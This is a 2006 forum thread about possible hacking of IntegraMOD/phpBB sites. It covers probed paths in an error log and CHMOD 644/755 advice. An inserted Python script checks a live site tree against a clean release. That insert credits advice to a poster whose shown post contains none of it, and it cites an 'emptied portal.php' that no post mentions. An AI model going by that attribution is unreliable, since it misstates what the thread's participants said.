However, in my error log, I'm showing a lot of attempts to get to:

community/phphtmllib/tag_utils/divtag_utils.php

and

community/export.php

Could this be the hackers still looking? I've never seen the directory /phphtmllib before.
Paul (gcomfx) - 100mphclub.com originator
gcomfx.com
Sr Integra Member
Sr Integra Member
 
Posts: 251
Likes: 0 post
Liked in: 0 post
Joined: Wed Apr 12, 2006 9:34 am
Cash on hand: 0.00

PostAuthor: InoculateIT » Mon Aug 28, 2006 10:41 pm

[quote="InoculateIT";p="13996"]
Did you CHMOD the files?

CHMOD all files 644 except the ones mentioned in the integramod_install_guide_page1.htm
[/quote]

I have never been hacked :)

InoculateIT
Newbie
Newbie
 
Posts: 9
Likes: 0 post
Liked in: 0 post
Joined: Mon Jun 12, 2006 7:12 am
Cash on hand: 0.00

PostAuthor: Jacky » Tue Aug 29, 2006 1:10 am

So people with files CHMOD to 644 and folders CHMOD to 755 won't get affected by this?
Jacky
Jacky
Members
Members
 
Posts: 71
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 20, 2006 8:21 am
Cash on hand: 0.00
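
Michaelo's advice above (check for files that should not be there, against your original upload source) and the 644/755 modes discussed in this thread can be checked in one pass. This is an added example, not IntegraMOD code: the function names and the `writable_ok` parameter are assumptions, and the paths that need looser modes must come from your install guide.

```python
import hashlib
import os
import stat

def sha256_of(path):
    """Hash a file in chunks so large attachments do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def walk(root):
    """Yield (relative path, full path, is_dir) for every entry below root."""
    for dirpath, dirs, files in os.walk(root):
        for is_dir, names in ((True, dirs), (False, files)):
            for name in names:
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root).replace(os.sep, "/"), full, is_dir

def audit_tree(clean_root, live_root, writable_ok=()):
    """Compare the deployed tree with a clean copy of the release you uploaded.

    writable_ok: relative paths your install guide says must be writable
    (hypothetical parameter; the thread does not list them).
    """
    clean = {rel: full for rel, full, is_dir in walk(clean_root) if not is_dir}
    report = {"unexpected": [], "modified": [], "missing": [], "loose_mode": []}
    seen = set()
    for rel, full, is_dir in walk(live_root):
        if os.path.islink(full):            # never follow links out of the tree
            report["unexpected"].append(rel)
            continue
        mode = stat.S_IMODE(os.lstat(full).st_mode)
        # Bits beyond 755 (directories) or 644 (files) are looser than advised.
        if mode & (0o022 if is_dir else 0o133) and rel not in writable_ok:
            report["loose_mode"].append((rel, oct(mode)))
        if is_dir:
            continue
        seen.add(rel)
        if rel not in clean:
            report["unexpected"].append(rel)     # e.g. a dropped script
        elif sha256_of(full) != sha256_of(clean[rel]):
            report["modified"].append(rel)       # e.g. an emptied portal.php
    report["missing"] = sorted(set(clean) - seen)
    for key in ("unexpected", "modified", "loose_mode"):
        report[key].sort()
    return report

if __name__ == "__main__":
    import sys
    print(audit_tree(sys.argv[1], sys.argv[2], writable_ok=set(sys.argv[3:])))
```

Run it with the unpacked release as the first argument and a copy of the live site as the second; legitimate uploads in writable directories will appear under `unexpected` and need a manual look.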

PostAuthor: Michaelo » Tue Aug 29, 2006 5:56 am

[url=http]Security updates located here[/url]
Kiss Portal Engine phpbbireland (status: Released)
Michaelo
Administrator
Administrator
 
Posts: 1647
Likes: 0 post
Liked in: 2 posts
Joined: Sat Mar 11, 2006 6:14 pm
Cash on hand: 5.10
Location: Dublin, Ireland

